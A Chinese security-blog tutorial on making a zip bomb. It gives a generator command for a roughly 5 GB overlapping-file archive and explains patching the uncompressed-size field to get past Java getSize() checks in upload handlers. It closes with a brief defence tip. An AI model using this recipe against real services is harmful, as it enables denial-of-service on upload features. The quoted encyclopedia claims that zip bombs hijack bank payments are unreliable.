微慑信息网

压缩炸弹(zipbomb)制作(附演示)

来自百度百科的介绍:

压缩包炸弹英文为Arc.Bomb,是一款压缩包病毒。它通常只有几百KB,但是解压后会变成上百MB的庞然大物。它能劫持网银支付链接,把网购交易资金劫持到黑客账户(还能这样搞?什么原理…欺骗杀毒软件一直陷入扫描中..然后部署病毒?.)。它能够利用特殊的技术逃过杀毒软件的云查杀系统。

一般来说,压缩文件的压缩比,就是压缩文件大小和解压缩之后文件大小的比例,超过20倍,一些杀毒即报告为压缩包炸弹,或者叫解压缩炸弹。因为一般压缩文件不会直接感染系统,而扫描压缩文件会减缓扫描速度,所以一般杀毒软件都会规定压缩比。

同理还有压缩文件嵌套层数,一般杀毒软件会根据自身的需要进行设置,比如说小红伞是24层,而ESET NOD32为10层。
为什么木马病毒要以“压缩炸弹”这样的形式发布呢?是因为木马作者对木马进行了特殊的加壳处理,使木马程序压缩至极致。而在解压的过程中,由于压缩率的不同,解压出来的文件大小也会不同,这样就能轻易躲过杀毒软件的“云查杀”系统。这可以说是一种很强大的免杀方式,是以后病毒和木马的主流

顺便参考http://www.sohu.com/a/250882983_355019

最近看到资料有说到ZIP炸弹,主要在存在上传功能且对上传文件有解压动作的地方,如果校验不严,可能导致压缩炸弹,导致消耗CPU导致宕机

1、生成ZIP炸弹:

https://github.com/CreeperKong/zipbomb-generator

python3 zipbomb.py --mode=quoted_overlap --num-files=250 --compressed-size=21179 > zbsm.zip

–num-files :压缩包包含的文件数量

–compressed-size:文件压缩大小

可以看到生成了一个zbsm.zip的压缩包,其中包含250个约20M大小的子文件,全部解压出来即有5G的大小,如果可以重放,则瞬间可填满硬盘

使用脚本查看解压后的大小:

python3 ratio.py zbsm.zip

linux下还可以使用dd命令 以及bzip2命令

2、场景:

有些上传处使用了如:

Java.util.jar.jarfile

Java.util.zip.Zipfile

通过 java.util.zip.ZipEntry.getSize()获取解压后的大小,可使用010editor对zip文件进行编辑:

struct ZIPFILERECORD record 为文件名;
uint frUncompressedSize为解压后的文件大小;

此处我们对uint frUncompressedSize进行修改,可绕过对解压后实际大小的判断:

如,我们修改uint frUncompressedSize大小为111:

 

利用java.util.zip进行解压后文件大小判断:

(java代码渣,求勿喷)

import java.io.*;
import java.util.zip.ZipEntry;
import java.util.zip.*;
public class Main {

    public static void main(String[] args) {
        File mfile = new  File("D:/05-MY-PROGRAM/m_java/zipboom/zbsm.zip");
        try {
            ZipFile zipFile = new  ZipFile(mfile);
            InputStream in=new BufferedInputStream(new FileInputStream(mfile));
            ZipInputStream zin=new ZipInputStream(in);
            ZipEntry ze;
            ze=zin.getNextEntry();
            System.out.println("ZIP'Size is :" + ze.getSize());
        }catch (Exception  e)
        {
            e.getStackTrace();
        }

    }
}

3、防御:

对上传zip文件进行文件个数、文件大小等进行判断

另参考:

https://www.bamsoftware.com/hacks/zipbomb/

 

 

赞(0) 打赏
转载请附本站链接,未经允许不得转载,,谢谢:微慑信息网-VulSee.com » 压缩炸弹(zipbomb)制作(附演示)

评论 抢沙发

微慑信息网 专注工匠精神

微慑信息网-VulSee.com-关注前沿安全态势,聚合网络安全漏洞信息,分享安全文档案例

访问我们联系我们

觉得文章有用就打赏一下文章作者

非常感谢你的打赏,我们将继续提供更多优质内容,让我们一起创建更加美好的网络世界!

支付宝扫一扫

微信扫一扫

登录

找回密码

注册